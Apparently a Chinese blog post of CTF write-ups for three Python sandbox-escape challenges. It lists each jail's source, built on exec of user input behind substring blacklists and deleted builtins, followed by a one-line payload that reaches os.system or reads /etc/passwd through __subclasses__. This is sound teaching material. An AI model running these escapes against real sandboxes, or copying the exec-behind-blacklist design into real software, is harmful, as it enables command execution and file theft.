python沙箱逃逸的幾道題
阿新 • • 發佈:2018-12-10
第一道
from __future__ import print_function
# Python 2 listing: `raw_input` and the statement form `exec data` are 2.x-only
# (the page notes that the first two challenges run under py2).
print("Welcome to my Python sandbox! Enter commands below!")
# Substring blacklist. Each entry is matched case-insensitively against the
# whole input line in the loop below.
banned = [
    "import",
    "exec",
    "eval",
    "pickle",
    "os",
    "subprocess",
    "kevin sucks",
    "input",
    "banned",
    "cry sum more",
    "sys"
]
# Unbind every builtin except raw_input and print before accepting input.
# NOTE(review): this removes the *names* from __builtins__, not the objects
# behind them. Anything still reachable from a live object (the payload quoted
# under this listing walks a type's __subclasses__) keeps its full capabilities.
targets = __builtins__.__dict__.keys()  # a plain list in Python 2, so remove() works
targets.remove('raw_input')
targets.remove('print')
for x in targets:
    del __builtins__.__dict__[x]
# Read / filter / exec loop. A line containing no banned substring is handed to
# exec with whatever the interpreter still exposes; a substring check is a
# string comparison, not a capability boundary.
while 1:
    print(">>>", end=' ')
    data = raw_input()
    for no in banned:
        if no.lower() in data.lower():
            print("Nobueno")
            break
    else:  # this means nobreak: no banned substring was found in the line
        exec data  # NOTE(review): exec of untrusted input; the blacklist above is the only guard
payload: ().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('ls')
第二道
#!/usr/bin/env python
# Python 2 listing (print statement, `except Exception, e`, `exec` statement).
from re import findall


def make_secure():
    # Unbind a fixed set of builtins by name.
    # NOTE(review): the objects behind these names stay in the process; the
    # page's payload for this challenge shows a file-reading class is still
    # reachable through __subclasses__, and `exec` itself is left available.
    UNSAFE = ['open', 'file', 'execfile', 'compile', 'reload', '__import__', 'eval', 'input']
    for func in UNSAFE:
        del __builtins__.__dict__[func]  # Remove dangerous builtins


make_secure()

print 'Go Ahead, Expoit me >;D'
while True:
    try:
        print ">>>",
        # Read user input until the first whitespace character.
        # findall(...)[0] raises IndexError on an empty or whitespace-only
        # line; the broad except below reports it like any other error.
        # (The pattern is not a raw string; `\S` is not a Python escape so it
        # survives, but r'\S+' is the usual form.)
        inp = findall('\S+', raw_input())[0]
        a = None
        # Set a to the result from executing the user input.
        # NOTE(review): the input is spliced into source text and exec'd with
        # full interpreter access; only the names removed in make_secure() are
        # unavailable, and only under those names.
        exec 'a=' + inp
        print 'Return Value:', a
    except Exception, e:
        print 'Exception:', e
payload:().__class__.__bases__[0].__subclasses__()[40]("/etc/passwd").read()
前兩道環境是py2,第三道是py3
第三道
# -*-coding:utf-8-*- #!/usr/bin/python3 import sys, cmd, os del __builtins__.__dict__['__import__'] del __builtins__.__dict__['eval'] intro = """ pwnhub cuit pwn everything Rules: -No import -No ... -No flag """ def execute(command): exec(command, globals()) class Jail(cmd.Cmd): prompt = '>>> ' filtered = '\'|.|input|if|else|eval|exit|import|quit|exec|code|const|vars|str|chr|ord|local|global|join|format|replace|translate|try|except|with|content|frame|back'.split('|') def do_EOF(self, line): sys.exit() def emptyline(self): return cmd.Cmd.emptyline(self) def default(self, line): sys.stdout.write('\x00') def postcmd(self, stop, line): if any(f in line for f in self.filtered): print("You are a big hacker !!!") print("Go away") else: try: execute(line) except NameError: print("NameError: name '%s' is not defined" % line) except Exception: print("Error: %s" % line) return cmd.Cmd.postcmd(self, stop, line) if __name__ == "__main__": try: Jail().cmdloop(intro) except KeyboardInterrupt: print("\rSee you next time !")
payload:print(getattr(os, "system")("whoami"))
等有空好好看看python面向物件的那一塊知識
參考連結:
http://www.php.cn/python-tutorials-356723.html
http://blog.51cto.com/13620939/2075204
https://xz.aliyun.com/t/52#toc-0
http://www.k0rz3n.com/2018/05/04/Python%20%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8%E5%A4%87%E5%BF%98/
http://www.bendawang.site/2018/03/01/%E5%85%B3%E4%BA%8EPython-sec%E7%9A%84%E4%B8%80%E4%BA%9B%E6%80%BB%E7%BB%93/